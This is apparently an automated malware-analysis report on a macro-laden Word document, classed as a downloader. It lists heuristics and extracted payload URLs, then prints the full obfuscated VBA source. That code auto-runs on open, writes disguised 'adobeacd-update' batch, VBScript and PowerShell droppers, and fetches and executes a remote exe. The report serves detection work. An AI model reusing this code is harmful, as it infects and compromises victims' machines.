MALICIOUS
Risk Score: 314
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with AutoOpen and GetObject calls, indicative of a downloader. The script attempts to construct a path and download a file from the URL http://app.www3-myups.org/officess.exe. This behavior is consistent with a macro-based downloader designed to fetch and execute a second-stage payload.
Heuristics 12
- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: Shell(b, 0)
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: Set objWMIService = GetObject _
- Payload URL assembled from a Chr()/Asc() string expression (3 URLs) (high, OLE_VBA_EXPR_DROPPER_URL): A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub AutoOpen()
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: Sub Workbook_Open()
- Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: Sub Auto_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: Environ(a)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://app.www3-myups.org/officess.exe (Referenced by macro)
  - http://savepic.su/5472937.png (Referenced by macro)
  - http://savepic.su/5479081.png (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (In document text (OLE body))
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (In document text (OLE body))
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20055 bytes |

SHA-256: 93cdd183048e32578441e6757ac6ee5dd3ea7f932d49cc422589f5c21d6a6910

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
h
End Sub
Sub h()
SKLDL = "j21kh3 jk12h3kj12h 3kj12h3 k1h21k3"
KSODW = Chr(Asc("d")) & "-" & Chr(Asc("u")) & Chr(Asc("p")) + Chr(Asc("d")) & "at" & Chr(Asc("e"))
LSJADKJSA = "asdjsalk jdkjsalasdwq8hq wk"
ASLDLSJADKJSA = "asdjsalwqdqwq jdkjsalasdwq8hq wk"
SDWLSJADKJSA = "asqwdqwdjsalk jdkjsalasdwq8hq wk"
BART212 = KSODW
JFIEDDD = Chr(Asc("c")) & ":\" & Chr(Asc("W")) & "i" & Chr(Asc(Chr(105 + 5))) & "do" & Chr(Asc("w")) & "s\" & Chr(Asc("T")) & "e" & Chr(Asc("m")) & "p\"
JDUIWAAA = Chr(Asc("c")) & "" & ":" & "\" & Chr(Asc(Chr(70 + 10 + 5))) & "s" & "e" & Chr(Asc(Chr(110 + 4))) & "s" & Chr(Asc("\"))
MDKWWW = "\" & Chr(Asc("A")) & "pp" & Chr(Asc("D")) & "ata\" & Chr(Asc("L")) & "ocal\" & Chr(Asc("T")) & "emp\"
JISKKK = Chr(97) + Chr(100) + "o" & Chr(Asc("b")) & "ea" & Chr(Asc("c")) + BART212
VBT2 = JISKKK
VBTXP2 = Chr(97) & Chr(100) & Chr(Asc("o")) & "be" + Chr(Asc("a")) & "c" & BART212 + Chr(Asc("x")) & Chr(Asc("p"))
HYDW = "" & Chr(Asc("a")) & Chr(Asc("d"))
BART2 = HYDW & "" & Chr(Asc("o")) & "b" & Chr(Asc("e")) & "ac" & BART212
PST2 = VBT2
HUEFQ = "" + Module4.Plain("" & Chr(Asc("u")) & "" & Chr(Asc("s")) & "er" + Chr(110) & "a" + Chr(109) + Chr(101) & "")
PST1 = "" + PST2 + "." + Chr(Asc("p")) + Chr(100 + 15) + "1" + ""
VBT1 = "" + VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
STT = "" + "44" + "4." + "pn" + "g" + ""
hjife = 51 + 50 + Sgn(-6)
kktd = hjife
BART = BART2 + Chr(Abs(kktd - 50 - 50 - 45 - Sgn(5))) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(Abs(kktd - 100 - 15 - 1)))) + ""
KJASKDJ = "kj23 k4j3k2jlk23j 4kl32j4 kh3 4jk23g 4hj23gfh gh2f 4hfg234hfg 23hgfg4f4 hg2f 4hg23f 4gh23f4h23f4 h23gf 4h23"
'JSIQOJQ = ""
JSIQOJQ = Chr(Abs(kktd - Sqr(4) - 100 - 44)) + Chr(Abs(kktd - 100 - 97 - Module3.Signing(15))) + Chr(Asc(Chr(Abs(kktd / 2 + Sqr(4) + 44 + Sgn(Sqr(16)))))) + Chr(Asc(Chr(kktd + Fix(16.2))))
KJHDU = BART2 + JSIQOJQ
KIOAJD = KJHDU
BART = KIOAJD
JIDWQQQ = JDUIWAAA + HUEFQ + MDKWWW
MY_FILENDIR = JIDWQQQ & PST1
STAT = JIDWQQQ & STT
ASDASDSA = JIDWQQQ & BART
MY_FILDIR = JIDWQQQ & VBT1
XPFILEDIR = ""
HJUTTT = VBTXP
XPFILEDIR = "" + JFIEDDD + HJUTTT
UHFD = "" & JFIEDDD
TRT = UHFD + BART
KRT = TRT
HYF = KRT
KJSAHDFFFJ = MY_FILDIR
Dim Kjqiwdj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
Dim Uuwqdhj As Integer
Dim retVal As Variant
FileNumber = FreeFile
FileNumb = FreeFile
FileNu = FreeFile
FileNukk = FreeFile
FileNs = FreeFile
Kasdwq = FreeFile
FileNuG = FreeFile
Dim objWMIService As Variant
Dim colOperatingSystems As Variant
Dim objOperatingSystem As Variant
Set objWMIService = GetObject _
("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem" & "")
For Each objOperatingSystem In colOperatingSystems
CJIS = objOperatingSystem.Version
SysReport = SysReport & "The operating system on this computer is " & _
objOperatingSystem.Caption & _
" (" & CJIS & Chr(Asc(")")) & ""
Next
Set objWMIService = GetObject _
("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ys" & "tem" & "")
For Each objOperatingSystem In colOperatingSystems
winverstr = objOperatingSystem.Version
Next
winver = Module3.Vava(winverstr)
WaitFor (1)
jskw = winver
URLLSK = "app.www3-myups.org/officess"
STAA = "sa" & "vepic.su/5472937"
STAB = "sa" & "vepic.su/5479081"
' UWGD = XPFILEDIR
' If (Len(Dir(MY_FILENDIR)) <> 0) Then
' SetAttr MY_FILENDIR, vbNormal
' Kill MY_FILENDIR
' End If
' If (Dir(ASDASDSA) <> "") Then
' SetAttr ASDASDSA, vbNormal
' Kill ASDASDSA
' End If
' If (Dir(MY_FILDIR) <> "") Then
' SetAttr MY_FILDIR, vbNormal
' Kill KJSAHDFFFJ
' End If
' If (Dir(STAT) <> "") Then
' SetAttr STAT, vbNormal
' Kill STAT
' End If
' If (Dir(UWGD) <> "") Then
' SetAttr UWGD, vbNormal
' Kill UWGD
' End If
If (jskw <= 5.5) Then
'NUWHDGJS = UHFD + "euifhszdf.jfi"
'Open NUWHDGJS For Output As #Kasdwq
'Close #Kasdwq
NUWHDGJS = HYF
Open NUWHDGJS For Output As #Kasdwq
Print #Kasdwq, ""
Print #Kasdwq, "" & Chr(Asc("@")) & "e" & "ch" & "o of" & "f" & ""
Print #Kasdwq, "" & ":" & "p" & "in" & "ka" & "tor" & ""
Print #Kasdwq, Chr(112) & "in" + "g 1.2.3.1 -n" & " 2" + ""
Print #Kasdwq, "set ggtt=" & Chr(34) & "bs" & Chr(34)
UHADKASJDWQD = "jkh32jkh2 jk4h2kj 4h3k2j4h jk23l4h 23"
Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP2 + ".v" + Chr(34) + "%ggtt%"
Print #Kasdwq, Chr(112) & "in" + "g 2.2.1.1 -n" & " 2" + ""
Print #Kasdwq, "" & ":windows"
Print #Kasdwq, ""
Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc(Chr(Asc("e")))) + Chr(Asc("x")) + Chr(Asc("e"))
Print #Kasdwq, ":loop"
Print #Kasdwq, Chr(112) & "in" + "g " + "1.3.1.2 -n" & _
" 1"
Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(30 + 3 + 1)
Print #Kasdwq, "set stat=" + Chr(34) + STT + Chr(33 + 1)
Print #Kasdwq, "del " + Chr(34) + "c:\W" & "indows\" & "Tem" & "p\" + VBTXP2 + ".v" + Chr(34) + "%ggtt%"
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%ta" + "r1%" + "" & ""
Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "" + "%s" + "tat%" + "" & ""
Print #Kasdwq, "if " + "exist " + Chr(34) & "" & "c" & ":" & "\W" + "in" & "dows" & "\T" + "emp" & "\" + Chr(34) + "%tar1%" + " goto loop" + ""
Print #Kasdwq, "" + "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "e" & "mp\" + "" & "" + VBTXP + Chr(34) + " g" + "ot" + "o lo" + "op" + ""
Print #Kasdwq, "exit"
Close #Kasdwq
WaitFor (2)
mttt = 88
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + "" & Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
Print #FileNumber, "" + "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
Print #FileNumber, "frgea =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(frgea)" + ""
Print #FileNumber, "Set mkH = C" + "reate" + Chr(Asc("O")) + "bject(frgea)"
Print #FileNumber, "" + "" & "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
Print #FileNumber, "mkH" & ".op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", statRT, False" + ""
JASHDJK = "send()"
Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
Print #FileNumber, "mkH." + JASHDJK + " "
Print #FileNumber, "" & "If objXMLHTTP.Status = 200 Then" + "" & ""
Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
Print #FileNumber, "" + "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
Print #FileNumber, "" + "ob" + "jA" + "DOSt" + "ream.O" + "pen " + ""
Print #FileNumber, "" & "objADOStream.Type = 1"
Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
Print #FileNumber, "objADOStream.Position = 0 "
Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
Print #FileNumber, "objADOStream.Close "
Print #FileNumber, "Set objADOStream = Nothing "
Print #FileNumber, "E" & "nd if " & ""
Print #FileNumber, "" + "Set objXMLHTTP = Nothing"
Print #FileNumber, "Set objS" + "hell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "" & Chr(Asc("S")) & "" + "cr" & "ipt" & "." + "S" + "hell" + Chr(34) + ")" + ""
Print #FileNumber, ""
Close #FileNumber
WaitFor (1)
ASKJD = TRT
NUS = Module3.Trance(retVal, ASKJD)
End If
If (winver > 5.5) Then
Open MY_FILENDIR For Output As #FileNumber
Print #FileNumber, "" & "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
Print #FileNumber, "" & "$stat = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + STAB & "" & ".p" & "n" + "g';"
HUHHUUHUHUHUHUKMK = "6ht76 7tftf t7f 7f yfk ftyf6f tu ftyf "
Print #FileNumber, "$gg" + "tt = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(116))) & "" + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://" + URLLSK & "" & "." & "" & "e" & "x" + "e';"
Print #FileNumber, "" & "$fi" & "le = 'c:\Users\" + HUEFQ + "\Ap" + "pDa" & "ta" & "\Lo" + "cal\T" & "e" + "mp\" + "4" & "44." + Chr(101) & "x" & "e';" + ""
Print #FileNumber, "$statfile = 'c:\Users\" + HUEFQ + "\AppData\Local\Temp\" + "4" & "44." + "j" & "pg';"
Print #FileNumber, "" & "" & "" & "" & "$do" & "wn.hea" & "ders[" + Chr(39) + "User-Agent" + Chr(39) + "] = " + Chr(39) + Chr(39) + "+" + "'Mozilla/5.0 (Ma" & "cintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
Print #FileNumber, "$dasdw='123';"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($gg" & "tt,$" & "file);"
Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($s" & "tat,$" & "statfile);"
Print #FileNumber, "$asdw='123';"
Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
Print #FileNumber, "$noneFilePath = 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\Te" & "mp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
JIUSD = "ad" & "obe'+'acd-up" & "date"
Print #FileNumber, "$vbsFilePath = 'c:\Users\" + HUEFQ + "" & "\" & "A" & Chr(Asc("p")) & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + "+" + Chr(39) + Chr(39) + ";"
Print #FileNumber, "$statFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + "444" + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "j" + Chr(39) + Chr(43) + Chr(39) + "pg" + Chr(39) + ";"
Print #FileNumber, "$b" + "tFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + HUEFQ + "\Ap" & "pData\Lo" & "cal\Te" & "mp\" + JIUSD + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s" + Chr(39) + "+" + Chr(39) + "1" + Chr(39) + ";"
Print #FileNumber, "St" & "art-Sleep -s 15;"
Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + HUEFQ + "\App" & "Data\Lo" & "cal\T" & "emp" + "\444.e" & Chr(120) & "e'; "
Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
Print #FileNumber, "$file2 = gci $" + "b" + "t" + "FilePath -Force"
Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
Print #FileNumber, "$kasldds = $vbsFilePath"
Print #FileNumber, "" + "If (Test-Path $kasldds){ Remove-Item $kasldds }"
Print #FileNumber, "" + "If (Test-Path $b" + "tFileP" + "ath){ Remove-Item $b" + "tFileP" + "ath }" + ""
Print #FileNumber, "" + "If (Test-Path $s" + "tatFileP" + "ath){ Remove-Item $st" + "atFileP" + "ath }" + ""
Print #FileNumber, "" + "$jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';" + ""
Print #FileNumber, "" + "If (Test-Path $no" + "neFi" + "leP" + "ath){ Remove-Item $n" + "oneFi" + "lePa" + "th }" + ""
Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
Close #FileNumber
KJUCBHS = " = "
Open MY_FILDIR For Output As #FileNumb
Print #FileNumb, "Dim dff"
Print #FileNumb, "dff = 68"
Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & "&" & Chr(34) & "S" & Chr(34) & Chr(38) & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) + "&" + Chr(34) + Chr(34) & ")"
KJSUWD = Chr(34) + "&" + Chr(34) + "ad" + "obe" + "acd-up" + "date"
Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + HUEFQ + "\AppData\Local\Temp" + "\" + KJSUWD + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s" + Chr(34) + "&" + Chr(34) + "1" + Chr(34)
Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + KJUCBHS & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
Print #FileNumb, "" + "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " + Chr(34) + Chr(34) + "+" & Chr(34) & "p" & Chr(111) & "w" + Chr(34) + "+" + Chr(34); "er" & Chr(83) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + "" & ""
Print #FileNumb, ""
Close #FileNumb
KSDOW = ASDASDSA
Open KSDOW For Output As #FileNs
Print #FileNs, "@echo off"
Print #FileNs, "pi" + "ng 1.1.2.2 -n" & " 2"
Print #FileNs, "chcp 1251"
Print #FileNs, ":asdqwqdw"
Print #FileNs, "set Gds1=" + Chr(34) + "." + Chr(34)
Print #FileNs, "set Gds2=" + Chr(34) + "v" + Chr(34)
Print #FileNs, "set Gds3=" + Chr(34) + "bs" + Chr(34)
Print #FileNs, "set Ads3=" + Chr(34) + "adobeacd" + Chr(34)
Print #FileNs, "set Ads4=" + Chr(34) + "-up" & "date" + Chr(34)
Print #FileNs, "set Gds4=" + Chr(34) & "c:\Users\" + HUEFQ + "\AppData\Local\Temp" + "\" + "" + Chr(34) + "%Ads3%" + "%Ads4%"
Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Gds4%" + "%Gds1%%Gds2%%Gds3%"
Print #FileNs, "exit"
Close #FileNs
SetAttr MY_FILENDIR, vbNormal
SetAttr ASDASDSA, vbNormal
SetAttr MY_FILDIR, vbNormal
WaitFor (1)
LJSUIAJHDKQ = ASDASDSA
NUS = Module3.Trance(retVal, LJSUIAJHDKQ)
End If
Module1.findTest
Module3.secondTest
Module1.abdklw
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Module3"
Public Function Trance(a As Variant, b)
a = _
Shell(b, 0)
Trance = a
End Function
Public Function Signing(a As Integer)
Signing = Sgn(a)
End Function
Public Function Vava(a)
Vava = Val(a)
End Function
Sub secondTest()
Dim firstTerm As String
Dim aFerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String
KISDQ = "in" & "bo" + "x>"
Set yytt = ActiveDocument.Range
firstTerm = "<" + KISDQ
aFerm = "</" + KISDQ
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True ' MatchWholeWord
LAJSDHUW = ".MatchWholeWord askj das"
'jklasjdklsajdiqow
.Execute
yytt.Collapse direction:=wdCollapseEnd
Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
'sdfiwelfjwilefjew
'asdkext = askld;sadka
.Text = _
aFerm ' KJSLADIW dsad sa
'KJKLhdaskd asd
.MatchWholeWord = True
'jeoifwjflsdfs
'.Executed
EXECUTEFDDD = "j jkh12jh3 kj2 1jkhlasljkdklj kj kl1h23j "
.Execute
yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub
Attribute VB_Name = "Module4"
Public Function Plain(a As String)
Plain = _
Environ(a)
End Function
Attribute VB_Name = "Module1"
Sub findTest()
Dim firstTerm, secondTerm, selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
JIS = Chr(Asc(Chr(60)))
SKDW = "" & "select>"
DSQQ = JIS + SKDW
ASQQ = JIS + "/" + SKDW
firstTerm = "" & DSQQ
secondTerm = "" & ASQQ
WITHrtas = "Find"
With hhhg.Find
.Text = firstTerm
.MatchWholeWord = True
'ashdkjqhdkjqwhdjk
.Execute
EXECUTEFD = "lakjsd"
hhhg.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = hhhg.End
.Text = secondTerm
.MatchWholeWord = True
'kashdjkashdkjashdjksh
'.Executed
EXECUTEFDDD = "j jkh12jh3 kj2 1jkhlasljkdklj kj kl1h23j "
.Execute
'.asdsa
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
selectedText = selRange.Delete
End With
End Sub
Sub abdklw()
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "<" & "sel" & "ect>" & ""
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "</s" & "ele" & "ct>" & ""
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "<" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
For Each myStoryRange In ActiveDocument.StoryRanges
With myStoryRange.Find
.Text = "" & "</" & "in" & "box>"
.Replacement.Text = " "
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
Next myStoryRange
End Sub